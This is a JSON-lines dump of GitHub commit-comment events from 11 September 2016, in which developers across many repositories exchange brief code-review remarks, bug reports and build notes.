{"id":"4546221755","type":"CommitCommentEvent","actor":{"login":"anselmdk"},"repo":{"name":"silvershop/silvershop-core"},"payload":{"comment":{"id":18977624,"position":null,"line":null,"path":null,"commit_id":"047bbdc7204556a9aa8f71de0efbc6723d75740f","created_at":"2016-09-11T17:50:49Z","updated_at":"2016-09-11T17:50:49Z","body":"@wilr what's the issue with changing this in the lang file?"}},"created_at":"2016-09-11T17:50:49Z"}
{"id":"4546221933","type":"CommitCommentEvent","actor":{"login":"skizzerz"},"repo":{"name":"lykoss/lykos"},"payload":{"comment":{"id":18977625,"position":27,"line":1174,"path":"src/gamemodes.py","commit_id":"037065b40cd12aa4c4f16ef3ccf6cf689c53670e","created_at":"2016-09-11T17:50:57Z","updated_at":"2016-09-11T17:50:57Z","body":"hosts don't follow IRC casing, use regular lowercase"}},"created_at":"2016-09-11T17:50:57Z"}
{"id":"4546222922","type":"CommitCommentEvent","actor":{"login":"Jhno591"},"repo":{"name":"Jhno591/citra"},"payload":{"comment":{"id":18977626,"position":null,"line":null,"path":null,"commit_id":"aaea70ceb1f81d1811dd9ce89a30c903df68b34f","created_at":"2016-09-11T17:51:40Z","updated_at":"2016-09-11T17:51:40Z","body":"Add Gateway cheat support #2063\r\naudio_core: Tweak audio latency #2059\r\nCheck for invalid TextureCopy size when copying #2057\r\n[RFC] Emulate motion sensor in frontend #1951\r\nImplemented CRO #1948\r\nImplement GetAddrInfo and GetNameInfo #1696\r\nDummy implement SVC::KernelSetState and PTM::ConfigureNew3DSCPU #1567\r\nImplement one variant of pipe 3 #43\r\n\r\nAdded wwlele hack svc.cpp line 507 - priority -= 1; // boost the priority a little if it is on SysCore\r\nFixes zelda a link between woulds loading and saving."}},"created_at":"2016-09-11T17:51:40Z"}
{"id":"4546225232","type":"CommitCommentEvent","actor":{"login":"jakofff"},"repo":{"name":"jakofff/monitor_mysqld.sh"},"payload":{"comment":{"id":18977629,"position":null,"line":null,"path":null,"commit_id":"4847f8e9a8fe049be0ddd578360afd5e06268fff","created_at":"2016-09-11T17:53:19Z","updated_at":"2016-09-11T17:53:19Z","body":"Shell que permite monitear el estado de mysql."}},"created_at":"2016-09-11T17:53:19Z"}
{"id":"4546237523","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18977648,"position":null,"line":null,"path":null,"commit_id":"4132d85888ac6c30729f58bb442a4a26a5b16cfe","created_at":"2016-09-11T18:01:53Z","updated_at":"2016-09-11T18:01:53Z","body":"This is Crypto++ 5.6.4. After this commit, we tagged Master with [`CRYTPOPP_5_6_4`](http://github.com/weidai11/cryptopp/releases/tag/CRYPTOPP_5_6_4)"}},"created_at":"2016-09-11T18:01:53Z"}
{"id":"4546238479","type":"CommitCommentEvent","actor":{"login":"daugustin"},"repo":{"name":"jkroepke/pulp"},"payload":{"comment":{"id":18977650,"position":6,"line":11,"path":"server/etc/default/systemd_pulp_workers","commit_id":"6c0b26aeefa3957706f4bb41ddbfdd8d39e10965","created_at":"2016-09-11T18:02:35Z","updated_at":"2016-09-11T18:02:35Z","body":"\"information\" is always singular."}},"created_at":"2016-09-11T18:02:35Z"}
{"id":"4546241526","type":"CommitCommentEvent","actor":{"login":"goblinJoel"},"repo":{"name":"rpgtoolkit/core"},"payload":{"comment":{"id":18977651,"position":null,"line":null,"path":null,"commit_id":"e6954c6eebf2e34ae9380b7550bd50bb78d5f060","created_at":"2016-09-11T18:04:31Z","updated_at":"2016-09-11T18:04:31Z","body":"The previous commit didn't solve conflicts completely. This one cleans up some that weren't as straightforward as just using the develop branch version."}},"created_at":"2016-09-11T18:04:31Z"}
{"id":"4546241690","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18977652,"position":null,"line":null,"path":null,"commit_id":"5afdc9726bb6d960c7c41df3ebae59a653c15e00","created_at":"2016-09-11T18:04:39Z","updated_at":"2016-09-11T18:04:39Z","body":"Actually this is not just a hackfix, this is just plain wrong, this is why https://github.com/cmangos/issues/issues/218 is happening."}},"created_at":"2016-09-11T18:04:39Z"}
{"id":"4546246689","type":"CommitCommentEvent","actor":{"login":"alexbagirov"},"repo":{"name":"MoarCatz/slack-timetable"},"payload":{"comment":{"id":18977655,"position":18,"line":14,"path":"README.md","commit_id":"655add9d1206743f36f9bc42514b1ae15c32ed90","created_at":"2016-09-11T18:07:53Z","updated_at":"2016-09-11T18:07:53Z","body":"@Leva7, this one seems to be written like I was coding in Pascal :smile: "}},"created_at":"2016-09-11T18:07:53Z"}
{"id":"4546246877","type":"CommitCommentEvent","actor":{"login":"rfostii"},"repo":{"name":"whoami7/CreateYourself"},"payload":{"comment":{"id":18977656,"position":14,"line":45,"path":"app/app.js","commit_id":"00540fdfbb9e6fecf18476cb3e00d904013d6599","created_at":"2016-09-11T18:08:00Z","updated_at":"2016-09-11T18:08:00Z","body":"You should not put this code here. Directive's link function is better place for it"}},"created_at":"2016-09-11T18:08:00Z"}
{"id":"4546248681","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977657,"position":null,"line":null,"path":null,"commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T18:09:09Z","updated_at":"2016-09-11T18:09:09Z","body":"It's all integrated and working on my end.  Not seeing any issues so far.\n\nthanks Alex and everyone that put this release together\n\noh by the way, what are these numbers here:\n\nThroughput: \"*1, 20, 2000, 3000*\" - just to be clear\n\nOn Sun, Sep 11, 2016 at 3:45 PM, Alex Hultman <notifications@github.com>\nwrote:\n\n> This commit increases Node.js performance by about 100% in throughput:\n>\n> Throughput: 20k, 20, 10, 3000:\n>\n> Node.js (before): 300 echoes/ms\n> Node.js (now): 570 echoes/ms\n> C++: 1100 echoes/ms\n>\n> Throughput: 1, 20, 2000, 3000:\n>\n> Node.js (before): 450 echoes/ms\n> Node.js (now): 1000 echoes/ms\n> C++: about 5000 echoes/ms (don't care to remember)\n>\n> @lpinca <https://github.com/lpinca> This will break the Primus\n> transformer, and might break your app if you expect to receive binary data\n> as Node.js Buffer. All binary data is now ArrayBuffer which can be wrapped\n> into a Node.js Buffer or any TypedArray like Uint8Array, etc.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/56abcced914497e1fc4fe24304b86564bc4aca8d#commitcomment-18977022>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0oSGsrC0f5t8nKgeGNWGWsubuetIks5qpAYGgaJpZM4J6Ao6>\n> .\n>\n"}},"created_at":"2016-09-11T18:09:09Z"}
{"id":"4546249807","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18977658,"position":null,"line":null,"path":null,"commit_id":"4f827ffad438bda7af125ee3320107a74d07c6b8","created_at":"2016-09-11T18:09:56Z","updated_at":"2016-09-11T18:09:56Z","body":"Uhm...\r\nAfter this, I now begin to uncloak after I land on a planet or enter a wormhole.\r\nAnd I leave the planet/wormhole uncloaked and begin to cloak.\r\nnotgud"}},"created_at":"2016-09-11T18:09:56Z"}
{"id":"4546253729","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977659,"position":null,"line":null,"path":null,"commit_id":"1038a7ea2391912060a3849b66ca73d9ac88e88f","created_at":"2016-09-11T18:12:29Z","updated_at":"2016-09-11T18:12:29Z","body":"OH NO.\n\nOn Sun, Sep 11, 2016 at 1:31 PM, Ricky C. <notifications@github.com> wrote:\n\n> Confidence :)\n>\n> On Sun, Sep 11, 2016 at 1:22 PM erinl1 <notifications@github.com> wrote:\n>\n> > do you mean testing each number and then adding to a variable everytime a\n> > # is larger than five?\n> > @rickyc <https://github.com/rickyc> or i might be reading it wrong\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/erinl1/nha-erinlee/commit/\n> 1038a7ea2391912060a3849b66ca73d9ac88e88f#commitcomment-18977566>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-\n> auth/AAG0kSgmRb57rvpxmAB06rL-N3vI8CvIks5qpDjAgaJpZM4J6DMS>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/1038a7ea2391912060a3849b66ca73d9ac88e88f#commitcomment-18977580>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQldnbII8obuavmd21N-bJaSORZuR2x8ks5qpDragaJpZM4J6DMS>\n> .\n>\n\n\n\n-- \n\nErin Lee\n"}},"created_at":"2016-09-11T18:12:29Z"}
{"id":"4546254754","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977661,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:13:12Z","updated_at":"2016-09-11T18:13:12Z","body":"Doesn't work on Visual Studio 2012, because of a compiler bug... I'm gunna need to revert, otherwise i will need to redo the Callback objects entirely as a template in order to add lambda expressions."}},"created_at":"2016-09-11T18:13:12Z"}
{"id":"4546255732","type":"CommitCommentEvent","actor":{"login":"pujatiwari9369"},"repo":{"name":"pujatiwari9369/hello-word"},"payload":{"comment":{"id":18977662,"position":1,"line":1,"path":"README.md","commit_id":"0f2f40680e0f1e07281000c4689c4799abc87bc3","created_at":"2016-09-11T18:13:51Z","updated_at":"2016-09-11T18:13:51Z","body":"Hello\r\n "}},"created_at":"2016-09-11T18:13:51Z"}
{"id":"4546258350","type":"CommitCommentEvent","actor":{"login":"brandondallas"},"repo":{"name":"brandondallas/bluegiraffe"},"payload":{"comment":{"id":18977664,"position":null,"line":null,"path":null,"commit_id":"3dbb46a250ab0b6ce2d87761928e3a47aa51dd25","created_at":"2016-09-11T18:15:40Z","updated_at":"2016-09-11T18:15:40Z","body":"![image](https://cloud.githubusercontent.com/assets/22133609/18419490/d0c4d248-7821-11e6-8dae-4593cd2effdd.png)\r\n"}},"created_at":"2016-09-11T18:15:40Z"}
{"id":"4546258585","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":18977665,"position":71,"line":71,"path":"opnsense/opnsense-pam-auth/opnsense-auth","commit_id":"1825f6f680bf3259a0bd5f25dc6ad7d24c3d1b9c","created_at":"2016-09-11T18:15:50Z","updated_at":"2016-09-11T18:15:50Z","body":"add word \"successfully\""}},"created_at":"2016-09-11T18:15:50Z"}
{"id":"4546261621","type":"CommitCommentEvent","actor":{"login":"bhgomes"},"repo":{"name":"bhgomes/apcompsci"},"payload":{"comment":{"id":18977667,"position":null,"line":null,"path":null,"commit_id":"08db1862c59a36d32390452913456ed352d08642","created_at":"2016-09-11T18:17:49Z","updated_at":"2016-09-11T18:17:49Z","body":"all further documentation (for Java language programs) should be in this format... LinkedList may not be fixed idk yet"}},"created_at":"2016-09-11T18:17:49Z"}
{"id":"4546264443","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977669,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:19:41Z","updated_at":"2016-09-11T18:19:41Z","body":"I set SDL check to off on cmake, but make sure its off. Let me compile before you revert. Also are lambda expression s compatible with 2010?"}},"created_at":"2016-09-11T18:19:41Z"}
{"id":"4546265807","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977672,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:20:39Z","updated_at":"2016-09-11T18:20:39Z","body":"i just reverted lulz"}},"created_at":"2016-09-11T18:20:39Z"}
{"id":"4546266004","type":"CommitCommentEvent","actor":{"login":"aiminickwong"},"repo":{"name":"aiminickwong/EayunOS-building"},"payload":{"comment":{"id":18977673,"position":null,"line":null,"path":null,"commit_id":"febd054818db23f3535d1adcd9fe0c74309b9d70","created_at":"2016-09-11T18:20:47Z","updated_at":"2016-09-11T18:20:47Z","body":"yes"}},"created_at":"2016-09-11T18:20:47Z"}
{"id":"4546266255","type":"CommitCommentEvent","actor":{"login":"dmulloy2"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":18977674,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-11T18:20:59Z","updated_at":"2016-09-11T18:20:59Z","body":"@L4BORG I agree, but the solution is definitely not to kick the player."}},"created_at":"2016-09-11T18:20:59Z"}
{"id":"4546266529","type":"CommitCommentEvent","actor":{"login":"apertix"},"repo":{"name":"xChris6041x/Devin"},"payload":{"comment":{"id":18977675,"position":null,"line":null,"path":null,"commit_id":"691950f9cc78c511e147749f8ef1c1d054ab7068","created_at":"2016-09-11T18:21:11Z","updated_at":"2016-09-11T18:21:11Z","body":"Girls can code?"}},"created_at":"2016-09-11T18:21:11Z"}
{"id":"4546266554","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977676,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:21:12Z","updated_at":"2016-09-11T18:21:12Z","body":"lambdas weren't introduced until C++11."}},"created_at":"2016-09-11T18:21:12Z"}
{"id":"4546267095","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977677,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:21:33Z","updated_at":"2016-09-11T18:21:33Z","body":"Ok looks like lambda is c++11 any ways."}},"created_at":"2016-09-11T18:21:33Z"}
{"id":"4546267547","type":"CommitCommentEvent","actor":{"login":"FaithLV"},"repo":{"name":"FaithLV/PCSX2-Spectabis"},"payload":{"comment":{"id":18977678,"position":null,"line":null,"path":null,"commit_id":"b4adb177e9f40b739fc09cce5f84a2ba5452cb89","created_at":"2016-09-11T18:21:52Z","updated_at":"2016-09-11T18:21:52Z","body":"Tested as working with .gz\r\nCompressing .cso at the moment, but should be working. Will test to be sure."}},"created_at":"2016-09-11T18:21:52Z"}
{"id":"4546267803","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977679,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:22:01Z","updated_at":"2016-09-11T18:22:01Z","body":"yeee, i'll be adding them in the library soon though."}},"created_at":"2016-09-11T18:22:01Z"}
{"id":"4546268153","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977680,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:22:17Z","updated_at":"2016-09-11T18:22:17Z","body":"Callback will end up being a template class if that's the case."}},"created_at":"2016-09-11T18:22:17Z"}
{"id":"4546269014","type":"CommitCommentEvent","actor":{"login":"vhart"},"repo":{"name":"charleshkang/Walmart"},"payload":{"comment":{"id":18977682,"position":18,"line":22,"path":"WalmartLabs/WalmartLabs/Products.swift","commit_id":"9ef7cb3766f451ea45ef0432c61660825d1354db","created_at":"2016-09-11T18:22:56Z","updated_at":"2016-09-11T18:22:56Z","body":"_style_ : you should multi line this initializers parameters. It stretches too far across the screen."}},"created_at":"2016-09-11T18:22:56Z"}
{"id":"4546269153","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977683,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:23:04Z","updated_at":"2016-09-11T18:23:04Z","body":"We really need to upgrade UGV's software."}},"created_at":"2016-09-11T18:23:04Z"}
{"id":"4546270164","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977684,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:23:43Z","updated_at":"2016-09-11T18:23:43Z","body":"They are considered C++ function pointers, which i wanted instead of dealing with C function pointers."}},"created_at":"2016-09-11T18:23:43Z"}
{"id":"4546270828","type":"CommitCommentEvent","actor":{"login":"brandondallas"},"repo":{"name":"brandondallas/bluegiraffe"},"payload":{"comment":{"id":18977685,"position":185,"line":185,"path":"stylesheets/stylesheet.css","commit_id":"89ab9808535553ca04f8ad31f0175d7f0a937e89","created_at":"2016-09-11T18:24:12Z","updated_at":"2016-09-11T18:24:12Z","body":"border:2;\r\n"}},"created_at":"2016-09-11T18:24:12Z"}
{"id":"4546270892","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":18977686,"position":5,"line":1041,"path":"extension/data/tbutils.js","commit_id":"900bdc97a09eb9624889c0bd083c5836ff1088bd","created_at":"2016-09-11T18:24:15Z","updated_at":"2016-09-11T18:24:15Z","body":"getHead()  topkek"}},"created_at":"2016-09-11T18:24:15Z"}
{"id":"4546271151","type":"CommitCommentEvent","actor":{"login":"brandondallas"},"repo":{"name":"brandondallas/bluegiraffe"},"payload":{"comment":{"id":18977687,"position":185,"line":185,"path":"stylesheets/stylesheet.css","commit_id":"89ab9808535553ca04f8ad31f0175d7f0a937e89","created_at":"2016-09-11T18:24:25Z","updated_at":"2016-09-11T18:24:25Z","body":"185\r\n"}},"created_at":"2016-09-11T18:24:25Z"}
{"id":"4546272067","type":"CommitCommentEvent","actor":{"login":"brodul"},"repo":{"name":"marksev1/mycroft-core"},"payload":{"comment":{"id":18977690,"position":35,"line":50,"path":"mycroft/skills/send_sms/__init__.py","commit_id":"21802f3a68d6406ad6ace73d88d29d7dcb3bd24c","created_at":"2016-09-11T18:25:05Z","updated_at":"2016-09-11T18:25:05Z","body":"Tole vrstico moras prestavit  sem https://github.com/marksev1/mycroft-core/commit/21802f3a68d6406ad6ace73d88d29d7dcb3bd24c#diff-e663dc13496300c0a4997505faa5228cR43. In dat pred sms `self.`"}},"created_at":"2016-09-11T18:25:05Z"}
{"id":"4546274168","type":"CommitCommentEvent","actor":{"login":"brodul"},"repo":{"name":"marksev1/mycroft-core"},"payload":{"comment":{"id":18977693,"position":35,"line":50,"path":"mycroft/skills/send_sms/__init__.py","commit_id":"21802f3a68d6406ad6ace73d88d29d7dcb3bd24c","created_at":"2016-09-11T18:26:25Z","updated_at":"2016-09-11T18:26:25Z","body":"ker drugace je `sms` lokalna spremenljivka. Ce das pa `self` spredaj pa bo navoljo po instanci classa."}},"created_at":"2016-09-11T18:26:25Z"}
{"id":"4546274328","type":"CommitCommentEvent","actor":{"login":"creesch"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":18977694,"position":5,"line":1041,"path":"extension/data/tbutils.js","commit_id":"900bdc97a09eb9624889c0bd083c5836ff1088bd","created_at":"2016-09-11T18:26:32Z","updated_at":"2016-09-11T18:26:32Z","body":"You realize you wrote that? "}},"created_at":"2016-09-11T18:26:32Z"}
{"id":"4546274881","type":"CommitCommentEvent","actor":{"login":"brodul"},"repo":{"name":"marksev1/mycroft-core"},"payload":{"comment":{"id":18977695,"position":44,"line":59,"path":"mycroft/skills/send_sms/__init__.py","commit_id":"21802f3a68d6406ad6ace73d88d29d7dcb3bd24c","created_at":"2016-09-11T18:26:52Z","updated_at":"2016-09-11T18:26:52Z","body":"tukaj tudi `self.` spredaj dodaj. :) "}},"created_at":"2016-09-11T18:26:52Z"}
{"id":"4546276082","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":18977696,"position":5,"line":1041,"path":"extension/data/tbutils.js","commit_id":"900bdc97a09eb9624889c0bd083c5836ff1088bd","created_at":"2016-09-11T18:27:39Z","updated_at":"2016-09-11T18:27:39Z","body":"Yes, a year later, I still find myself funny."}},"created_at":"2016-09-11T18:27:39Z"}
{"id":"4546281899","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18977698,"position":42,"line":42,"path":"src/gui/dialogs/end_credits.cpp","commit_id":"d0cae514ff0cd4672a70b9e2925329fcd34db3be","created_at":"2016-09-11T18:31:31Z","updated_at":"2016-09-11T18:31:31Z","body":"...wait, what? What's this about?"}},"created_at":"2016-09-11T18:31:31Z"}
{"id":"4546283183","type":"CommitCommentEvent","actor":{"login":"vhart"},"repo":{"name":"charleshkang/Walmart"},"payload":{"comment":{"id":18977699,"position":32,"line":22,"path":"WalmartLabs/WalmartLabs/Product.swift","commit_id":"f1d1091240857511f2f04aac8d9069b129792836","created_at":"2016-09-11T18:32:23Z","updated_at":"2016-09-11T18:32:23Z","body":"_style_ multi line your initializer\r\n"}},"created_at":"2016-09-11T18:32:23Z"}
{"id":"4546283305","type":"CommitCommentEvent","actor":{"login":"timovn"},"repo":{"name":"timovn/blogotext"},"payload":{"comment":{"id":18977700,"position":null,"line":null,"path":null,"commit_id":"8899e43cbad69c81547ddeaa658e277c5e5f670a","created_at":"2016-09-11T18:32:29Z","updated_at":"2016-09-11T18:32:29Z","body":"There are actually style problems when browsing tags.\r\nAlso there might be a performance \"issue\" regarding the use of a new SQL request.\r\n\r\nI’ll try to find a fix for that."}},"created_at":"2016-09-11T18:32:29Z"}
{"id":"4546283602","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18977701,"position":null,"line":null,"path":null,"commit_id":"9111004adbcf7e42f03e815750cdcb2ac7bddf97","created_at":"2016-09-11T18:32:42Z","updated_at":"2016-09-11T18:32:42Z","body":"i think the yellow spell wand should be in minotaur mage instead of orc shaman?"}},"created_at":"2016-09-11T18:32:42Z"}
{"id":"4546284720","type":"CommitCommentEvent","actor":{"login":"ViralBShah"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977702,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T18:33:23Z","updated_at":"2016-09-11T18:33:23Z","body":"That's what we use - but I have no idea how to figure out a lower bound."}},"created_at":"2016-09-11T18:33:23Z"}
{"id":"4546286087","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18977704,"position":21,"line":484,"path":"src/tests/gui/test_gui2.cpp","commit_id":"d0cae514ff0cd4672a70b9e2925329fcd34db3be","created_at":"2016-09-11T18:34:26Z","updated_at":"2016-09-11T18:34:26Z","body":"Oh, whoops, forgot the comma... -_-;"}},"created_at":"2016-09-11T18:34:26Z"}
{"id":"4546286807","type":"CommitCommentEvent","actor":{"login":"rottegift"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18977705,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-11T18:34:57Z","updated_at":"2016-09-11T18:34:57Z","body":"Current experiment is to create a root below the heap (in your plain vmem_experiments that would be the heap_parent one), and vmem_add(thatvmp, ptr, size) 1 GiB spans to it, then run as a fixed size.\r\n\r\nIt's running.   There won't be calls to xnu's freer until spl finishes.\r\n\r\nThe downside is that this really does permanently wire down memory, and without major rewriting, you can only grow by doing vmem_add in future; it's not dynamic in the vmem layer, and you can't shrink below whatever you've vmem_added.\r\n\r\nOn the other hand, if you try something like this and get no glitches (you shouldn't) even during maximal writes, this might be an acceptable trade-off.\r\n\r\nhttps://github.com/rottegift/spl/commit/f6395b968c674b0bf93f679dc69deebfeafa76af\r\n\r\nhttps://github.com/rottegift/spl/commit/93153157523197cb03871df5b593d331342fc892"}},"created_at":"2016-09-11T18:34:57Z"}
{"id":"4546287054","type":"CommitCommentEvent","actor":{"login":"grayjay"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18977706,"position":21,"line":223,"path":"cabal-install/tests/UnitTests/Distribution/Solver/Modular/QuickCheck.hs","commit_id":"c36d11ff2e94458a51ae69368c84f1549ddba09c","created_at":"2016-09-11T18:35:10Z","updated_at":"2016-09-11T18:35:10Z","body":"CD.fromList already combines the components that are complete duplicates, so I only had to remove components with the same name but different component types.  I should have left the comment.  I can make a PR to update the old comment and/or simplify the code."}},"created_at":"2016-09-11T18:35:10Z"}
{"id":"4546287348","type":"CommitCommentEvent","actor":{"login":"mgedmin"},"repo":{"name":"github/hub"},"payload":{"comment":{"id":18977708,"position":79,"line":79,"path":"vendor/github.com/howeyc/gopass/pass.go","commit_id":"70d7bb66d54c922ef7bdfe59bb26283b7cb8a365","created_at":"2016-09-11T18:35:19Z","updated_at":"2016-09-11T18:35:19Z","body":"FWIW I think the bug was caused by this Println() writing a `\\n` to the terminal before the deferred `terminal.Restore()` call told it to convert that `\\n` into a proper carriage-return-and-line-feed sequence."}},"created_at":"2016-09-11T18:35:19Z"}
{"id":"4546293264","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":18977712,"position":9,"line":56,"path":"source/ceylon/ast/core/Identifier.ceylon","commit_id":"c70f1965a18f43123a692032b48c22c4bb13fe71","created_at":"2016-09-11T18:39:25Z","updated_at":"2016-09-11T18:39:25Z","body":"doh!"}},"created_at":"2016-09-11T18:39:25Z"}
{"id":"4546293606","type":"CommitCommentEvent","actor":{"login":"snogcel"},"repo":{"name":"dashpay/bitcore-node-dash"},"payload":{"comment":{"id":18977713,"position":null,"line":null,"path":null,"commit_id":"cdd618633876cdbc896b28676c13dc2dc19c08e5","created_at":"2016-09-11T18:39:41Z","updated_at":"2016-09-11T18:39:41Z","body":"note: this build will fail for now -- download script needs to be updated with new v0.12.1.x binary location"}},"created_at":"2016-09-11T18:39:41Z"}
{"id":"4546293650","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18977714,"position":27,"line":84,"path":"src/gui/dialogs/end_credits.cpp","commit_id":"8604d811e071a2551e8e2c17cf85eb97fa81e5ed","created_at":"2016-09-11T18:39:42Z","updated_at":"2016-09-11T18:39:42Z","body":"I'm kind of surprised this worked, given that I tried something similar in the menu scrolling work... though with invisible rather than hidden. Maybe that makes the difference (using invisible probably triggers a relayout or something)."}},"created_at":"2016-09-11T18:39:42Z"}
{"id":"4546293899","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":18977715,"position":9,"line":56,"path":"source/ceylon/ast/core/Identifier.ceylon","commit_id":"c70f1965a18f43123a692032b48c22c4bb13fe71","created_at":"2016-09-11T18:39:51Z","updated_at":"2016-09-11T18:39:51Z","body":"hrm."}},"created_at":"2016-09-11T18:39:51Z"}
{"id":"4546296167","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18977718,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-11T18:41:26Z","updated_at":"2016-09-11T18:41:26Z","body":"After this commit, or the next one (https://github.com/cmangos/mangos-wotlk/commit/01e867acf33fe52f72512c60fb9cb1cd4a30d971), the server throws errors at every tick.\r\n**Please fix, or revert!**\r\n\r\n![Broken server](https://s14.postimg.org/onejpud0h/server_error.png)\r\n"}},"created_at":"2016-09-11T18:41:26Z"}
{"id":"4546298111","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":18977721,"position":9,"line":56,"path":"source/ceylon/ast/core/Identifier.ceylon","commit_id":"c70f1965a18f43123a692032b48c22c4bb13fe71","created_at":"2016-09-11T18:42:46Z","updated_at":"2016-09-11T18:42:46Z","body":"(also `CeylonExpressionTransformer`)"}},"created_at":"2016-09-11T18:42:46Z"}
{"id":"4546300012","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":18977722,"position":null,"line":null,"path":null,"commit_id":"c0c95f81d6d11fa47488bcfd77396bb95b470bdc","created_at":"2016-09-11T18:44:08Z","updated_at":"2016-09-11T18:44:08Z","body":"@Faithcaio When did you become an collaborator? Congrats."}},"created_at":"2016-09-11T18:44:08Z"}
{"id":"4546300058","type":"CommitCommentEvent","actor":{"login":"alanorth"},"repo":{"name":"ilri/hpc-environment-modules"},"payload":{"comment":{"id":18977723,"position":null,"line":null,"path":null,"commit_id":"177c7b17da5244d0944d6dbd1993e902c1b856a2","created_at":"2016-09-11T18:44:10Z","updated_at":"2016-09-11T18:44:10Z","body":"Shouldn't you check if `python/3.4.3` is loaded, rather than just `python`?"}},"created_at":"2016-09-11T18:44:10Z"}
